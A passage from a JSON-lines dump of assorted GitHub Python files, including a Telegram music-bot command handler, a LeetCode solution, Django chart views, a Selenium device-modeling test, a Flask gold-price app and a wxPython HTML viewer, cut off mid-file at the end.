So we have to convert RGB or any\n other type to RGBA in this case\n \"\"\"\n\n if watermark.type() != ImageType.TrueColorMatteType:\n watermark.type(ImageType.TrueColorMatteType)\n depth = 255 - int(255 * opacity)\n watermark.quantumOperator(ChannelType.OpacityChannel,QuOp.MaxQuantumOp, depth)\n","repo_name":"vaad2/flowershop","sub_path":"sorl_watermarker/engines/pgmagick_engine.py","file_name":"pgmagick_engine.py","file_ext":"py","file_size_in_byte":1983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16105693396","text":"import asyncio\nfrom os import path\n\nfrom pyrogram import filters\nfrom pyrogram.types import Message, InlineKeyboardMarkup, Voice\nfrom youtube_search import YoutubeSearch\n\nfrom FallenMusic import (BOT_USERNAME, DURATION_LIMIT_SEC, DURATION_LIMIT,\n BOT_NAME, app, db_mem)\nfrom FallenMusic.Helpers.Url import get_url\nfrom FallenMusic.Cache.checker import checker\nfrom FallenMusic.Cache.assistant import AssistantAdd\nfrom FallenMusic.Cache.permission import PermissionCheck\nfrom FallenMusic.Helpers.Thumbnails import thumb_init\nfrom FallenMusic.Helpers.PyTgCalls.Converter import convert\nfrom FallenMusic.Helpers.PyTgCalls.Downloader import download\nfrom FallenMusic.Helpers.Database import add_served_user, add_served_chat\nfrom FallenMusic.Helpers.Changers import seconds_to_min, time_to_seconds\nfrom FallenMusic.Helpers.Stream import start_stream, start_stream_audio\nfrom FallenMusic.Helpers.Ytinfo import (get_yt_info_id, get_yt_info_query, get_yt_info_query_slider)\n\n\nloop = asyncio.get_event_loop()\n\n\n@app.on_message(\n filters.command([\"play\", f\"play@{BOT_USERNAME}\"]) & filters.group\n)\n@checker\n@PermissionCheck\n@AssistantAdd\nasync def play(_, message: Message):\n try:\n await message.delete()\n except:\n pass\n await add_served_chat(message.chat.id)\n if message.chat.id not in db_mem:\n db_mem[message.chat.id] = {}\n if message.sender_chat:\n return await message.reply_text(\n \"**» ʏᴏᴜ'ʀᴇ ᴀɴ ᴀɴᴏɴʏᴍᴏᴜs ᴀᴅᴍɪɴ.\\n\\nʀᴇᴠᴇʀᴛ ʙᴀᴄᴋ ᴛᴏ ᴜsᴇʀ ᴀᴄᴄᴏᴜɴᴛ ғᴏʀ ᴜsɪɴɢ ᴍᴇ.**\"\n )\n audio = (\n (message.reply_to_message.audio or message.reply_to_message.voice)\n if message.reply_to_message\n else None\n )\n url = get_url(message)\n if audio:\n mystic = await message.reply_text(\n \"**↻ ᴩʀᴏᴇssɪɴɢ...\\n\\nᴩʟᴇᴀsᴇ ᴡᴀɪᴛ...**\"\n )\n\n if audio.file_size > 314572800:\n return await mystic.edit_text(\n \"**» ᴀᴜᴅɪᴏ ғɪʟᴇ sɪᴢᴇ sʜᴏᴜʟᴅ ʙᴇ ʟᴇss ᴛʜᴀɴ 300ᴍʙ.**\"\n )\n duration_min = seconds_to_min(audio.duration)\n duration_sec = audio.duration\n if (audio.duration) > DURATION_LIMIT_SEC:\n return await mystic.edit_text(\n f\"**» {BOT_NAME} ᴅᴏᴇsɴ'ᴛ ᴀʟʟᴏᴡ ᴛᴏ ᴩʟᴀʏ ᴛʀᴀᴄᴋs ʟᴏɴɢᴇʀ ᴛʜᴀɴ {DURATION_LIMIT_MIN} ᴍɪɴᴜᴛᴇs.**\"\n )\n file_name = (\n audio.file_unique_id\n + \".\"\n + (\n (audio.file_name.split(\".\")[-1])\n if (not isinstance(audio, Voice))\n else \"ogg\"\n )\n )\n file_name = path.join(path.realpath(\"downloads\"), file_name)\n file = await convert(\n (await message.reply_to_message.download(file_name))\n if (not path.isfile(file_name))\n else file_name,\n )\n return await start_stream_audio(\n message,\n file,\n \"smex1\",\n \"Given Audio Via Telegram\",\n duration_min,\n duration_sec,\n mystic,\n )\n elif url:\n mystic = await message.reply_text(\"**↻ sᴇᴀʀᴄʜɪɴɢ...\\n\\nᴩʟᴇᴀsᴇ ᴡᴀɪᴛ...**\")\n if not message.reply_to_message:\n query = message.text.split(None, 1)[1]\n else:\n query = message.reply_to_message.text\n (\n title,\n duration_min,\n duration_sec,\n thumb,\n videoid,\n ) = get_yt_info_query(query)\n title, 
duration_min, duration_sec, thumbnail = get_yt_info_id(videoid)\n if duration_sec > DURATION_LIMIT_SEC:\n return await message.reply_text(\n f\"**» {BOT_NAME} ᴅᴏᴇsɴ'ᴛ ᴀʟʟᴏᴡ ᴛᴏ ᴩʟᴀʏ ᴛʀᴀᴄᴋs ʟᴏɴɢᴇʀ ᴛʜᴀɴ {DURATION_LIMIT_MIN} ᴍɪɴᴜᴛᴇs.**\"\n )\n downloaded_file = await loop.run_in_executor(\n None, download, videoid, mystic, title\n )\n raw_path = await convert(downloaded_file)\n thumb = await thumb_init(videoid)\n await mystic.delete()\n else:\n if len(message.command) < 2:\n await message.reply_photo(\n photo=\"FallenMusic/Utilities/play.jpg\",\n caption=(\n \"**➻ ᴛʜɪs ɪs ɴᴏᴛ ᴛʜᴇ ᴄᴏʀʀᴇᴄᴛ ғᴏʀᴍᴀᴛ ᴛᴏ ᴩʟᴀʏ.**\\n\\n**ᴇxᴀᴍᴩʟᴇ :** /play [sᴏɴɢ ɴᴀᴍᴇ ᴏʀ ʏᴏᴜᴛᴜʙᴇ ʟɪɴᴋ ᴏʀ ʀᴇᴩʟʏ ᴛᴏ ᴀ ᴀᴜᴅɪᴏ]\"\n ),\n )\n return\n mystic = await message.reply_text(\"**↻ sᴇᴀʀᴄʜɪɴɢ...\\n\\nᴩʟᴇᴀsᴇ ᴡᴀɪᴛ...**\")\n query = message.text.split(None, 1)[1]\n (\n title,\n duration_min,\n duration_sec,\n thumb,\n videoid,\n ) = get_yt_info_query(query)\n await mystic.delete()\n title, duration_min, duration_sec, thumbnail = get_yt_info_id(videoid)\n if duration_sec > DURATION_LIMIT_SEC:\n return await message.reply_text(\n f\"**» {BOT_NAME} ᴅᴏᴇsɴ'ᴛ ᴀʟʟᴏᴡ ᴛᴏ ᴩʟᴀʏ ᴛʀᴀᴄᴋs ʟᴏɴɢᴇʀ ᴛʜᴀɴ {DURATION_LIMIT} ᴍɪɴᴜᴛᴇs.**\"\n )\n mystic = await message.reply_text(\n f\"**{BOT_NAME} ᴅᴏᴡɴʟᴏᴀᴅᴇʀ**\\n\\n**ᴛɪᴛʟᴇ :** {title}\\n\\n0% ■■■■■■■■ 100%\"\n )\n downloaded_file = await loop.run_in_executor(\n None, download, videoid, mystic, title\n )\n chat_id = message.chat.id\n user_id = message.from_user.id\n raw_path = await convert(downloaded_file)\n thumb = await thumb_init(videoid)\n if chat_id not in db_mem:\n db_mem[chat_id] = {}\n await start_stream(\n message,\n raw_path,\n videoid,\n thumb,\n title,\n duration_min,\n duration_sec,\n mystic,\n )\n","repo_name":"Devarora-0981/SpideyMusic","sub_path":"FallenMusic/Modules/Play.py","file_name":"Play.py","file_ext":"py","file_size_in_byte":6056,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"61"} +{"seq_id":"72565739074","text":"'''\n\nDescription:\n\nGiven an array of integers nums and a positive integer k, find whether it's possible to divide this array into sets of k consecutive numbers\nReturn True if its possible otherwise return False.\n\n \n\nExample 1:\n\nInput: nums = [1,2,3,3,4,4,5,6], k = 4\nOutput: true\nExplanation: Array can be divided into [1,2,3,4] and [3,4,5,6].\nExample 2:\n\nInput: nums = [3,2,1,2,3,4,3,4,5,9,10,11], k = 3\nOutput: true\nExplanation: Array can be divided into [1,2,3] , [2,3,4] , [3,4,5] and [9,10,11].\nExample 3:\n\nInput: nums = [3,3,2,2,1,1], k = 3\nOutput: true\nExample 4:\n\nInput: nums = [1,2,3,4], k = 3\nOutput: false\nExplanation: Each array should be divided in subarrays of size 3.\n \n\nConstraints:\n\n1 <= nums.length <= 10^5\n1 <= nums[i] <= 10^9\n1 <= k <= nums.length\n\n'''\n\n\n\nfrom collections import Counter\nfrom typing import List\nclass Solution:\n def isPossibleDivide(self, nums: List[int], k: int) -> bool:\n \n if len(nums)%k != 0:\n # Quick response:\n # Reject because it is impossible to make sets\n return False\n \n if k == 1:\n # Quick response:\n # Accept with trivial solution by making set with each single element itself\n return True\n \n \n # Make number sorted in ascending order\n nums.sort()\n \n # dictionary:\n # key : number\n # value : occurrence\n num_occ_dict = Counter( nums )\n \n \n # Make consecutive sets of size k from the smallest element\n for n in nums:\n \n occ_for_partition = num_occ_dict[n]\n \n if occ_for_partition == 0:\n continue\n \n \n for i in range(k):\n \n if 
num_occ_dict[n+i] < occ_for_partition:\n # Reject:\n # Either number (n+i) doesn't exist, or\n # occurrence of (n+i) is not enough to make consecutive sets with k\n return False\n \n # after making sets, update occurrence\n num_occ_dict[n+i] -= occ_for_partition\n \n return True\n\n\n\n# n : the number of elements in nums\n# k : the number of unique elements in nums\n\n## Time Complexity: O( n )\n#\n# The overhead in time is the cost of Timsort, which is of O( n log n).\n\n\n## Space Complexity: O( k )\n#\n# The overhead in space is the storage for dictionary, num_occ_dict, which is of O( k ).\n\n\n\ndef test_bench():\n\n test_data = [\n ( [1,2,3,3,4,4,5,6], 4),\n ( [3,2,1,2,3,4,3,4,5,9,10,11], 3),\n ( [3,3,2,2,1,1], 3),\n ( [1,2,3,4],3)\n ]\n\n for sequence, k in test_data:\n\n print( Solution().isPossibleDivide(sequence, k) )\n \n return \n\n\n\nif __name__ == '__main__':\n\n test_bench()","repo_name":"brianchiang-tw/leetcode","sub_path":"No_1296_Divide Array in Sets of K Consecutive Numbers/divide_array_in_sets_of_k_consecutive_numbers_by_dict_and_sort.py","file_name":"divide_array_in_sets_of_k_consecutive_numbers_by_dict_and_sort.py","file_ext":"py","file_size_in_byte":2907,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"61"} +{"seq_id":"71942107073","text":"from django.contrib.auth import get_user_model\nfrom django.shortcuts import render\nfrom django.views.generic import View\nfrom django.http import JsonResponse, HttpResponse\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nimport pandas as pd\n\n#json formatting\nimport json\n\nimport csv\n\n#File Paths\nfrom settings import BASE_DIR\n\n#GLOBALS\npokemon_csv = BASE_DIR + '/pokemon-sun-and-moon-gen-7-stats/pokemon.csv'\nmoves_csv = BASE_DIR + '/pokemon-sun-and-moon-gen-7-stats/moves.csv'\n\n#HomeView contains ajax api calls to TableData and PokemonChartData etc.\nclass HomeView(View):\n def get(self, request, *args, **kwargs):\n return render(request, 'charts.html')\n\nclass MovesView(View):\n def get(self, request, *args, **kwargs):\n return render(request, 'moves.html')\n\nclass TableData(APIView):\n\n authentication_classes = []\n permission_classes = []\n\n def get(self, request, format=None):\n df = pd.read_csv(pokemon_csv, header=None).fillna('N/A').values.tolist()\n\n header = list(map(lambda col: {'title': col}, df[0]))\n pokemon = json.dumps(df[1:])\n\n data = {\n \"data\": pokemon,\n \"columns\": header\n }\n\n return Response(data)\n\nclass PokemonChartData(APIView):\n #structure and format data for charts.js to display, aggregate, group etc.\n\n def get(self, request, format=None):\n df2 = pd.read_csv(pokemon_csv)\n\n type_counts = df2['type1'].value_counts().tolist()\n types = df2['type1'].value_counts().index.tolist()\n\n type2_counts = df2['type2'].value_counts().tolist()\n types2 = df2['type2'].value_counts().index.tolist()\n\n data = {\n \"types\": types,\n \"type_counts\": type_counts,\n \"types2\": types2,\n \"type2_counts\": type2_counts\n }\n\n return Response(data)\n\n\nclass PokemonMovesChartData(APIView):\n\n\n def get(self, request, format=None):\n\n result = {}\n with open(moves_csv, 'rb') as moves:\n csvreader = csv.reader(moves, delimiter=',')\n next(csvreader, None)\n for row in csvreader:\n if row[3] in result:\n if row[4] in result[row[3]]:\n result[row[3]][row[4]] += 1\n\n else:\n result[row[3]][row[4]] = 1\n else:\n result[row[3]] = {}\n result[row[3]][row[4]] = 1\n\n types = result.keys()\n status = 
[result[x]['Status'] for x in result]\n special = [result[x]['Special'] for x in result]\n physical = [result[x]['Physical'] for x in result]\n\n data = {\n 'types': types,\n 'special': special,\n 'status': status,\n 'physical': physical\n\n }\n\n return Response(data)\n\n\n\n","repo_name":"Diongarman/Web","sub_path":"Django/Django-Chart.js-9deb1d489250aca706b9939ae0bad331d0709982/src/charts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17620749813","text":"import unittest\n\nfrom util.selTestUtils import *\n\nfrom SelTestBase import SelTestBase\n\ndynamicdev = 'gate2.zenoss.loc'\n\nclass TestModelWindowsDevice(SelTestBase):\n \"\"\"Defines an object that runs tests for modeling the win2k-test2 device\"\"\"\n\n def _setWindowszProperties(self):\n sel = self.selenium\n sel.click(\"link=Devices\")\n sel.wait_for_page_to_load(\"30000\")\n sel.click(\"link=Server\")\n sel.wait_for_page_to_load(\"30000\")\n sel.click(\"link=Windows\")\n sel.wait_for_page_to_load(\"30000\")\n sel.click(\"link=zProperties\")\n sel.wait_for_page_to_load(\"30000\")\n sel.type(\"zWinUser:string\", \"zenoss-test\")\n sel.type(\"zWinPassword:string\", \"zenoss\")\n sel.click(\"saveZenProperties:method\")\n sel.wait_for_page_to_load(\"30000\")\n sel.click(\"link=Windows\")\n sel.wait_for_page_to_load(\"30000\")\n \n def testModelWin2kTest(self):\n \"\"\"Tests Modeling win2k-test2\"\"\"\n sel = self.selenium\n self._setWindowszProperties()\n self.addDeviceModelWindows('win2k-test2.zenoss.loc')\n sel.click(\"link=OS\")\n sel.wait_for_page_to_load(\"30000\")\n sel.click(\"document.ipServiceListForm.onlyMonitored\")\n sel.wait_for_page_to_load(\"30000\")\n self.failUnless(sel.is_element_present(\"link=epmap\"))\n self.failUnless(sel.is_element_present(\"link=netbios-ns\"))\n self.failUnless(sel.is_element_present(\"link=netbios-dgm\"))\n self.failUnless(sel.is_element_present(\"link=netbios-ssn\"))\n self.failUnless(sel.is_element_present(\"link=snmp\"))\n self.failUnless(sel.is_element_present(\"link=microsoft-ds\"))\n self.failUnless(sel.is_element_present(\"link=isakmp\"))\n self.failUnless(sel.is_text_present(\"1 of 9\"))\n self.deleteDevice('win2k-test.zenoss.loc')\n \n \n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"zenoss/zenoss-prodbin","sub_path":"Products/ZenUITests/tests/selenium/TestModelWindowsCore.py","file_name":"TestModelWindowsCore.py","file_ext":"py","file_size_in_byte":1900,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"61"} +{"seq_id":"17198064669","text":"import os\nfrom io import open\nimport subprocess\nfrom setuptools import setup, find_packages\n\nHERE = os.path.abspath(os.path.dirname(__file__))\n\nwith open(os.path.join(HERE, 'README.md'), encoding='utf-8') as f:\n LONG_DESCRIPTION = f.read()\n\nwith open(os.path.join(HERE, 'requirements.txt'), encoding='utf-8') as f:\n INSTALL_REQUIRES = f.read().split('\\n')\n\nPACKAGE_VERSION = subprocess.check_output('git describe --tags', shell=True).decode('ascii').strip()\n\nsha = 'Unknown'\ntry:\n sha = subprocess.check_output(['git', 'rev-parse', 'HEAD'], cwd=HERE).decode('ascii').strip()\nexcept Exception:\n pass\n\nPACKAGE_VERSION_LOCAL = PACKAGE_VERSION + '+' + sha[:7]\n\nsetup(\n name='easyproxy',\n version=PACKAGE_VERSION,\n author='xiangyuejia',\n author_email='xiangyuejia@qq.com',\n description='An easy way to get high-hidden proxy 
(轻松获取高匿代理)',\n    long_description=LONG_DESCRIPTION,\n    long_description_content_type='text/markdown',\n    url='git@git.woa.com:yuejiaxiang/easy-proxy.git',\n    packages=find_packages(),\n    classifiers=[\n        'Programming Language :: Python :: 3',\n        'License :: OSI Approved :: MIT License',\n        'Operating System :: OS Independent',\n    ],\n    install_requires=[] + INSTALL_REQUIRES,\n    python_requires='>=3.6, <4',\n)\n","repo_name":"yuejiaxiang/easy-proxy","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"43724620043","text":"from pathlib import Path\nimport shutil\n\n#\n# 元ファイルを残してコピー先ファイルを読み書きするためのクラス\n# 1ファイルずつ作成、編集、削除することを前提として編集以外を自動化する\n#\nclass CopiedFiles:\n    def __init__(self, basedir: Path, filter=None):\n        # 実在するディレクトリでなければエラー\n        basedir = Path(basedir)\n        if not basedir.is_dir() or not basedir.exists():\n            raise FileNotFoundError\n        # フィルターが関数でなければエラー\n        filter = filter or (lambda f: True)\n        if not callable(filter):\n            raise TypeError\n        \n        # インスタンス作成時点で条件に一致するファイルを覚えておく\n        self.basedir = basedir\n        self.files = [f for f in self.basedir.glob('**/*') if f.is_file() and filter(f)]\n        self.openfile = None\n        # 作業ディレクトリを作る(スコープから抜けるときに削除する)\n        self.tempdir = Path(__file__).parent.joinpath('__files_temporary__')\n        self.tempdir.mkdir(parents=True, exist_ok=True)\n\n    # with構文で使えるようにする\n    def __enter__(self):\n        return self\n    \n    def __exit__(self, exc_type, exc_value, traceback):\n        self.close_opened_file()\n        shutil.rmtree(self.tempdir, ignore_errors=True)\n\n    def __del__(self):\n        # __exit__ expects (exc_type, exc_value, traceback)\n        self.__exit__(None, None, None)\n\n    def next(self):\n        self.close_opened_file()\n        for file in self.files:\n            self.orgfile = file\n            tempfile = self.tempdir.joinpath(file.name)\n            shutil.copy(file, tempfile)\n            self.openfile = open(tempfile, 'r+')\n            yield self.openfile\n        # 終わったら忘れる\n        self.files = []\n        return None\n\n    def close_opened_file(self):\n        if self.openfile and not self.openfile.closed:\n            self.openfile.close()\n        # 忘れる\n        self.openfile = None\n        self.orgfile = None\n\n    @property\n    def filedir(self):\n        return self.orgfile.parent if self.openfile and not self.openfile.closed else \"\"\n\n    @property\n    def filename(self):\n        return self.orgfile.name if self.openfile and not self.openfile.closed else \"\"\n\n\n#\n# 使い方\n#\ndef usage():\n    desired_files = {\n        'basedir': Path.cwd(),\n        'filter': lambda f: f.suffix == '.py'\n    }\n    with CopiedFiles(**desired_files) as files:\n        # 1周目(有効)\n        print('first')\n        for file in files.next():\n            print(f'directory: {files.filedir}, file: {files.filename}')\n        # 2周目(無効)\n        print('second')\n        for file in files.next():\n            print(f'directory: {files.filedir}, file: {files.filename}')\n\n\nif __name__ == '__main__':\n    usage()\n","repo_name":"redgemgithub/pythonmemo","sub_path":"copied_files_class.py","file_name":"copied_files_class.py","file_ext":"py","file_size_in_byte":2805,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"27499325518","text":"import sys\n\n\nsys.stdin = open('input.txt')\n\nN = int(input())\n\nimport collections\n\nq = collections.deque()\nfor i in range(1, N+1):\n    q.append(i)\nwhile len(q) != 1:\n    q.popleft()\n    q.append(q.popleft())\nprint(q[0])\n\n\n","repo_name":"khjeon5328/today_algorithm","sub_path":"2021/2021.01월/8일/2164.py","file_name":"2164.py","file_ext":"py","file_size_in_byte":221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"7784952987","text":"import streamlit as st\nimport pandas as pd\nimport requests\nfrom functions.parse_number_by_group_of_three import parse_number\n\nfrom functions.truncate_number import truncate\n\nst.set_page_config(\n page_title=\"Evolution des heures de jeux au cours du temps\",\n page_icon=\"📈\",\n)\n\nst.markdown(\"# Evolution des heures de jeux au cours du temps\")\n\n# Chargement des données\ndf = pd.read_csv(\"data/applicationInformation.csv\", sep=\",\", header=\"infer\", encoding=\"Latin-1\")\n# Conversion de l\"id en string\ndf[\"appid\"] = df[\"appid\"].astype(str)\n# On affiche la liste des jeux pour filtrer\noption = st.selectbox(\"Quelle jeu voulez vous voir ?\", df[\"name\"])\n# Résultat du filtre\nst.write(\"Jeux sélectionné : \", option)\n\nappName = option\nappId = df[df[\"name\"] == appName][\"appid\"].values[0]\n\n# On considère que le joueur a joué 1h par jour\nnbHourPlayedPerPlayer = 1\nnbHourPlayedPerPlayer = st.slider(\"Nombre d'heure joué par joueur : \", 1, 24, 1)\n\nif appId != \"\" and appName != \"\":\n if st.button(\"Afficher les graphiques\"):\n st.markdown(\"## Graphique des heures de jeux : \" + appName)\n \n url = \"https://api.steampowered.com/ISteamUserStats/GetNumberOfCurrentPlayers/v1/?appid=\" + appId\n resp = requests.get(url=url)\n data = resp.json()\n nbPlayerConnected = data[\"response\"][\"player_count\"]\n st.markdown(\"Nombre de joueur actuelement connecté : \" + str(nbPlayerConnected))\n imageLocation = \"https://cdn.akamai.steamstatic.com/steam/apps/\" + appId + \"/header.jpg\"\n st.markdown(\"![](\" + imageLocation + \")\")\n # On récupère le fichier des heures de jeux du jeu sélectionné\n fichierLocation = \"data/PlayerCountHistory/\" + appId + \".csv\"\n df = pd.read_csv(fichierLocation, sep=\",\", header=\"infer\", encoding=\"Latin-1\")\n # On convertit la colonne Time du type object en datetime\n df['Time'] = pd.to_datetime(df['Time'])\n # On convertit la colonne Time du format datetime en date\n df[\"Time\"] = df[\"Time\"].dt.strftime(\"%Y-%m-%d\")\n # On regroupe les heures par jours pour avoir un dataframe plus petit\n df = df.groupby(\"Time\").sum().reset_index()\n # On affiche le dataframe en tableau\n # st.dataframe(df)\n # On affiche le dataframe en courbe\n st.line_chart(df, x='Time', y=['Playercount'])\n # On calcule la totalité des heures de jeux\n total = df[\"Playercount\"].sum()\n st.markdown(\"## Total des heures de jeux : \" + str(parse_number(truncate(total))))\n # Nombre d'heures pour construire la tour Eiffel 2 ans, 2 mois et 5 jours\n nbHourToBuildEiffelTower = 2 * 365 * 24 + 2 * 30 * 24 + 5 * 24\n # Nombre d'heures pour construire une maison 10 mois\n nbHourToBuildHouse = 10 * 30 * 24\n # Nombre d'heures pour assembler un airbus a320 4 jours\n nbHourToBuildAirbusA320 = 4 * 24\n # Nombre d'heures pour construire la Grande Pyramide de Gizeh 20 ans, 4 mois et 5 jours\n nbHourToBuildGreatPyramidOfGiza = 20 * 365 * 24 + 4 * 30 * 24 + 5 * 24\n # Nombre d'heures de vie moyenne d'un humain 80 ans\n nbHourToLive = 80 * 365 * 24\n\n # On affiche le nombre de Tour Eiffel que l'on aurait pu construire\n st.markdown(\"Nombre de Tour Eiffel que l'on aurait pu construire : \" + str(parse_number(truncate(int(total / nbHourToBuildEiffelTower)*nbHourPlayedPerPlayer))))\n # On affiche le nombre de maison que l'on aurait pu construire\n st.markdown(\"Nombre de maison que l'on aurait pu construire : \" + str(parse_number(truncate(int(total / nbHourToBuildHouse)*nbHourPlayedPerPlayer))))\n # On affiche le nombre d'Airbus 
A320 que l'on aurait pu construire\n st.markdown(\"Nombre d'Airbus A320 que l'on aurait pu construire : \" + str(parse_number(truncate(int(total / nbHourToBuildAirbusA320)*nbHourPlayedPerPlayer))))\n # On affiche le nombre de Grande Pyramide de Gizeh que l'on aurait pu construire\n st.markdown(\"Nombre de Grande Pyramide de Gizeh que l'on aurait pu construire : \" + str(parse_number(truncate(int(total / nbHourToBuildGreatPyramidOfGiza)*nbHourPlayedPerPlayer))))\n # On affiche le nombre de vie que l'on aurait pu vivre\n st.markdown(\"Nombre de vie que l'on aurait pu vivre : \" + str(parse_number(truncate(int(total / nbHourToLive)*nbHourPlayedPerPlayer))))","repo_name":"leo-doyen/openSteamData","sub_path":"pages/📈_4_Evolution_heures_par_jeux.py","file_name":"📈_4_Evolution_heures_par_jeux.py","file_ext":"py","file_size_in_byte":4351,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70151635715","text":"# -*- coding: utf-8 -*-\n# @Author: JinZhang\n# @Date: 2018-11-21 11:13:33\n# @Last Modified by: JinZhang\n# @Last Modified time: 2018-11-21 12:27:09\nimport wx \nimport wx.html2\nimport webbrowser\n\nclass MyHtmlFrame(wx.Frame): \n\tdef __init__(self, parent, title): \n\t\twx.Frame.__init__(self, parent, -1, title, size = (600,400)) \n\t\t# html = wx.html2.HtmlWindow(self) \n\n\t\t# if \"gtk2\" in wx.PlatformInfo: \n\t\t# \thtml.SetStandardFonts() \n\n\t\t# dlg = wx.TextEntryDialog(self, 'Enter a URL', 'HTMLWindow') \n\n\t\t# if dlg.ShowModal() == wx.ID_OK: \n\t\t# \thtml.LoadPage(dlg.GetValue()) \n\n\t\t# wx.CallAfter(html.LoadPage, \"https://www.baidu.com/\")\n\t\t# wx.CallAfter(html.LoadFile, \"E:\\\\Project\\\\JSWorkSpace\\\\PiXiProjects\\\\PiXiJS_Test\\\\index.html\")\n\t\tbrowser = wx.html2.WebView.New(self, style=0)\n\t\twx.CallAfter(browser.LoadURL, \"http://127.0.0.1:8020/PiXiJS_Test/index.html?__hbt=1542774008894\")\n\t\t# webbrowser.open_new(\"https://www.baidu.com\")\n\t\t\napp = wx.App() \nfrm = MyHtmlFrame(None, \"Simple HTML Browser\") \nfrm.Show() \napp.MainLoop()","repo_name":"JDreamHeart/DailyCodes","sub_path":"python/wx模块相关/HTML窗口/HtmlWindow.py","file_name":"HtmlWindow.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"2100956091","text":"import copy\ndef solution(key, lock):\n m = len(key[0])\n n = len(lock[0])\n y = []\n x = []\n answer = False\n def rotated(a):\n r_y = len(a)\n\n result = [[0]* r_y for _ in range(r_y)]\n\n for i in range(r_y):\n for j in range(r_y):\n result[j][r_y-i-1] = a[i][j]\n return result\n \n\n for i in range(n - m +1):\n for j in range(n -m +1):\n count =0\n \n for k in range(4):\n key = rotated(key)\n lock_copy = copy.deepcopy(lock)\n check_point = lock_copy[j:j+m][i:i+m]\n for l ,p in zip(key,check_point):\n for o in range(len(key)):\n p[o] = (l[o] + p[o])\n print(lock_copy)\n for l_check in lock_copy :\n if 0 not in l_check and 2 not in l_check:\n count +=1\n if count == len(lock):\n return True \n else:\n count = 0 \n return answer\n\n\nkey = [[0, 1, 0], [0, 1, 0], [0, 0, 0]]\nlock = [[1, 1, 1, 1], [1, 1, 1,1], [0,0, 1, 1],[1,1,1,1]]\nprint(solution(key,lock))","repo_name":"YuHyeonGeun-KOR/My-Algorithm-Journey","sub_path":"This is cote/Chapter 4.Implementation/lock&key(1).py","file_name":"lock&key(1).py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} 
+{"seq_id":"23619361041","text":"#!/usr/local/bin/pypy\nimport sys\nimport re\n\nimport codejam\n\nprob = codejam.Problem()\n\n# Program.\n\ndef answer(combinations, opposing, invoked):\n # The next few lines are evaluated only once per test case (100 times...)\n opposingregs = [re.compile('(.*%(a)s.*%(b)s|.*%(b)s.*%(a)s)' %\n {'a': l[0], 'b': l[1]}) for l in opposing]\n \n combinations = dict([(x[0:2], x[2]) for x in combinations] + [(x[0:2][::-1], x[2]) for x in combinations])\n \n output = ''\n last = ''\n for i in xrange(len(invoked)):\n output += invoked[i]\n combo = combinations.get(output[-2:])\n if not combo is None: output = output[:-2] + combo\n delete = any([r.match(output) for r in opposingregs])\n if delete: output = ''\n return str(list(output)).replace(\"'\", '')\n\ndef emptyfalse(x): return x != ''\n\nl = 0\nfor line in prob.readlines()[1:]:\n l += 1\n line = [x.strip() for x in re.split('\\d+', line)[1:]]\n if len(line) != 3: raise BaseException(l)\n prob.write_case(answer(filter(emptyfalse, line[0].split(' ')),\n filter(emptyfalse, line[1].split(' ')),\n line[2]\n ))","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_75/960.py","file_name":"960.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3307959087","text":"from flask import Flask, render_template\nimport sqlite3\napp = Flask(__name__)\n\n\ndef get_db_connection():\n conn = sqlite3.connect('database.db')\n conn.row_factory = sqlite3.Row\n return conn\n\n\n@app.route('/gold')\ndef list():\n conn = get_db_connection()\n GOLD = conn.execute('SELECT * FROM GOLD').fetchall()\n conn.close()\n return render_template('index.html', GOLD=GOLD)\n\n\n@app.route('/laxmi-price')\ndef laxmi():\n price = {}\n conn = get_db_connection()\n laxmi = conn.execute(\n \"\"\"SELECT price FROM GOLD WHERE name='laxmi'\"\"\").fetchone()\n conn.close()\n price[\"price\"] = laxmi[\"price\"]\n return price\n\n\n@app.route('//gold')\ndef details(brand):\n details = {}\n conn = get_db_connection()\n detail = conn.execute(\n 'SELECT * FROM GOLD WHERE name=?', (brand,)).fetchall()\n conn.close()\n details[\"name\"] = detail[0][1]\n details[\"price\"] = detail[0][2]\n details[\"purity\"] = detail[0][1]\n details[\"Email\"] = detail[0][3]\n details[\"image_url\"] = detail[0][4]\n return details\n\n\n@app.route('/')\ndef main():\n return render_template('main.html')\n","repo_name":"jazeel659/FLASK-TUTORIAL","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12871560065","text":"import itertools\nimport logging\nimport os\nimport sys\nimport time\nimport warnings\nfrom typing import Set, Union\n\nimport wx\nfrom OCC.wrapper.AIS import (\n AIS_DS_Erased, AIS_DS_None, AIS_InteractiveContext, AIS_ListOfInteractive,\n AIS_SOP_NothingSelected, AIS_SOP_OneSelected, AIS_SOP_SeveralSelected,\n AIS_Shaded, AIS_Shape_SelectionMode, AIS_TOAX_Unknown, AIS_TOAX_XAxis,\n AIS_TOAX_YAxis, AIS_TOAX_ZAxis, AIS_TOI_Both, AIS_TOI_IsoU, AIS_TOI_IsoV,\n AIS_WireFrame, Handle_AIS_InteractiveObject, 